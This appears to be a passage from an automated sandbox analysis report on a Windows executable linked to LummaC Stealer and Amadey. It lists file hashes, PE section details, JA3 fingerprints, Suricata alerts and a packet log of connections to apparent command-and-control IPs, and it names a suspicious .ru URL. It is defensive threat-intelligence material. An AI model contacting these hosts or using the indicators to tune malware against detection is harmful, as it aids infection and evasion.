                                                https://yousign.app/signatures/f4bc189e-eb94-419a-8c6d-f771bde372b3?s=801791fbcf262c5f0bb15f5752069a2688018a0dba6f5ec910fda8abdadc27ffa3bbd590e9689442d02c12f9e6c4e6ece12f7b0cf847c0521a88de6016075c39&r=34449ad686b12baff90ef39bb3be4334&source=email&lang=fr&magic_link_id=8e2d9b37-150d-4509-9a7a-10125e260c14&domain_id=b48fb217dc&k=zqvNTc7eaLGc3vUtOaMyEtccEILIqP1gGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                https://x.to0wfnubykn8.ru/hjkewtr/hgjtyu.htmlGet hashmaliciousUnknownBrowse
                                                • 104.21.96.1
                                                SELECTELRUQyk8RJnGN7.exeGet hashmaliciousLummaC StealerBrowse
                                                • 176.113.115.7
                                                nrKr2roAsG.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                9GNLDc2CHH.exeGet hashmaliciousLummaC StealerBrowse
                                                • 176.113.115.7
                                                jx22fssg2d.exeGet hashmaliciousLummaC StealerBrowse
                                                • 176.113.115.7
                                                EUsF26UAMM.exeGet hashmaliciousLummaC StealerBrowse
                                                • 176.113.115.7
                                                JtH26qoxr2.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                0Q6EWqWu4N.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                C75q85Awi4.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                5yCKVE324w.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6
                                                6nsLmbufDq.exeGet hashmaliciousAmadeyBrowse
                                                • 176.113.115.6

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                a0e9f5d64349fb13191bc781f81f42e1ySTYvI9Pvk.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                6aOM10d2pR.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                Ec0AgD2t1q.exeGet hashmaliciousDarkVision RatBrowse
                                                • 104.21.80.1
                                                750413b4e6897a671bc759e04597952a0be747830189873b.xlsm.1.ps1Get hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                quotation_1.xlsxGet hashmaliciousUnknownBrowse
                                                • 104.21.80.1
                                                Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                                • 104.21.80.1
                                                750413b4e6897a671bc759e04597952a0be747830189873b.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                Qyk8RJnGN7.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                h2H2R15NDO.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1
                                                m3gyyctL5A.exeGet hashmaliciousLummaC StealerBrowse
                                                • 104.21.80.1

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.586487807042658
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:ASIr1Bo2x9.exe
                                                File size:2'990'592 bytes
                                                MD5:f9915de2e2ca00d8d19a8d021b433926
                                                SHA1:c01697bdad14b649af9616304f356fe04d0258d8
                                                SHA256:f81ed393ec7b3eec60ef2b2d01b03468c38e968e1140ed060e80bdcd859be802
                                                SHA512:95f15a8c9224f58bb34d4b4e5165baf09dc42f166b47c943302e382298a6e1c120711e44db4a0d5c33f9236a6bcf547e7b71cde7f123465a87bc8ecdcae7bcd7
                                                SSDEEP:49152:Jg4R9lFlKwmW28Shg9MqRzllvOhP/+TqM:J39lFAwmWJSWKqNllmhA
                                                TLSH:D8D54CE2B909B1CFE4DE67745527CE8A596D03B94B1088C3A8A8747E7E63CC115F7C28
                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g..............................0...........@...........................0......9....@.................................W...k..

                                                File Icon

                                                Icon Hash:90cececece8e8eb0

                                                Static PE Info

                                                General

                                                Entrypoint:0x70c000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x67E154E2 [Mon Mar 24 12:49:38 2025 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Instruction
                                                jmp 00007F30F4E1441Ah
                                                jo 00007F30F4E14443h
                                                add byte ptr [eax], al
                                                jmp 00007F30F4E16415h
                                                add byte ptr [esi], al
                                                or al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], 00000000h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                push es
                                                or al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx], cl
                                                add byte ptr [eax], 00000000h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x610570x6b.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x300.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x611f80x8.idata
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                0x10000x5f0000x2d800c243887783b30ea2200c7e8e1c85ec96False0.9980898008241759data7.9841832142391IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x600000x3000x200993ddf49a89aa517a1a6e2d5ed4882aeFalse0.869140625data6.5071606312298025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata 0x610000x10000x200f47b289bcee0e13a937cc29db13607bfFalse0.150390625data1.0437720338377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                cwkdpops0x620000x2a90000x2a8e0058866b02985cb124a6f2ec57c8d607dcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                sifugpmh0x30b0000x10000x60049b3b76f0164553e2cb8d9caa9709a7cFalse0.5787760416666666data4.962743501804128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant0x30c0000x30000x2200b322131e6dfe9ce74cc5381d431fb6afFalse0.0642233455882353DOS executable (COM)0.6917303992715064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_MANIFEST0x30aab00x2a5XML 1.0 document, ASCII text0.4963072378138848
                                                DLLImport
                                                kernel32.dlllstrcpy

                                                Network Behavior

                                                Download Network PCAP: filteredfull

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-03-25T14:59:18.501983+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449723104.21.80.1443TCP
                                                2025-03-25T14:59:21.115173+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449724104.21.80.1443TCP
                                                2025-03-25T14:59:23.183594+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449725104.21.80.1443TCP
                                                2025-03-25T14:59:24.583046+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449726104.21.80.1443TCP
                                                2025-03-25T14:59:27.097605+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449727104.21.80.1443TCP
                                                2025-03-25T14:59:28.417307+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449728104.21.80.1443TCP
                                                2025-03-25T14:59:30.257214+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449729104.21.80.1443TCP

                                                Network Port Distribution

                                                • Total Packets: 104
                                                • 443 (HTTPS)
                                                • 80 (HTTP)
                                                • 53 (DNS)
                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 25, 2025 14:59:18.236114979 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.236156940 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:18.236248016 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.239916086 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.239938974 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:18.501681089 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:18.501982927 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.505374908 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.505383015 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:18.505635977 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:18.555988073 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.569125891 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.569160938 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:18.569267035 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032444954 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032530069 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032586098 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032594919 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.032608986 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032686949 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032727003 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.032736063 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.032773972 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.033210993 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.033217907 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.033428907 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.033690929 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.033776999 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.034862995 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.034871101 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.081029892 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.136184931 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.136408091 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.136502028 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.136593103 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.136610985 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137217999 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.137228012 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137495995 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137547970 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.137567043 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137654066 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137763977 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137789965 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.137799025 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.137902975 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138000965 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138029099 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.138037920 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138144016 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138170004 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.138233900 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138262033 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.138268948 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138307095 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.138324022 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138438940 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.138500929 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.142261028 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.142261028 CET49723443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:19.142282963 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:19.142291069 CET44349723104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:20.894051075 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:20.894098997 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:20.894169092 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:20.895386934 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:20.895406008 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.115094900 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.115173101 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.117794991 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.117805004 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.118065119 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.119599104 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.119771004 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.119821072 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.119884968 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.119896889 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.675816059 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.675944090 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.675998926 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.676150084 CET49724443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.676170111 CET44349724104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.952675104 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.952714920 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:21.952841043 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.953212976 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:21.953224897 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.183501959 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.183593988 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.185405970 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.185417891 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.186103106 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.187334061 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.187711000 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.187711000 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.187757969 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.819238901 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.819340944 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:23.819399118 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.820970058 CET49725443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:23.820995092 CET44349725104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.359883070 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.359924078 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.360130072 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.360493898 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.360508919 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.582842112 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.583045959 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.584501982 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.584516048 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.584760904 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.588597059 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.588658094 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.588675976 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:24.588747978 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:24.588757038 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:25.179291964 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:25.179450035 CET44349726104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:25.179615021 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:25.179645061 CET49726443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:26.883166075 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:26.883219004 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:26.883307934 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:26.883662939 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:26.883673906 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.097449064 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.097604990 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.099026918 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.099039078 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.099414110 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.100745916 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.100858927 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.100907087 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.640465975 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.640599966 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:27.640682936 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.640908003 CET49727443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:27.640927076 CET44349727104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.199148893 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.199209929 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.199299097 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.199665070 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.199676991 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.417028904 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.417306900 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.418452978 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.418472052 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.418802023 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.420105934 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.420874119 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.420914888 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421034098 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421066046 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421195984 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421238899 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421366930 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421401024 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421546936 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421575069 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421730995 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421768904 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.421780109 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421948910 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.421998978 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.464283943 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.464590073 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.464669943 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.464689016 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.508271933 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.508635044 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.508773088 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.508836985 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.552277088 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.552438021 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:28.596318960 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:28.734894037 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:29.987850904 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:29.987992048 CET44349728104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:29.988199949 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:29.988231897 CET49728443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034193993 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034245014 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.034553051 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034926891 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.034939051 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.257097006 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.257214069 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.258526087 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.258542061 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.258903027 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.261240959 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.261302948 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.261329889 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.914897919 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.915075064 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.915443897 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.920742035 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.920763016 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.920808077 CET49729443192.168.2.4104.21.80.1
                                                Mar 25, 2025 14:59:30.920815945 CET44349729104.21.80.1192.168.2.4
                                                Mar 25, 2025 14:59:30.930593967 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:31.931042910 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:33.946698904 CET4973080192.168.2.4176.113.115.7
                                                Mar 25, 2025 14:59:37.946762085 CET4973080192.168.2.4176.113.115.7
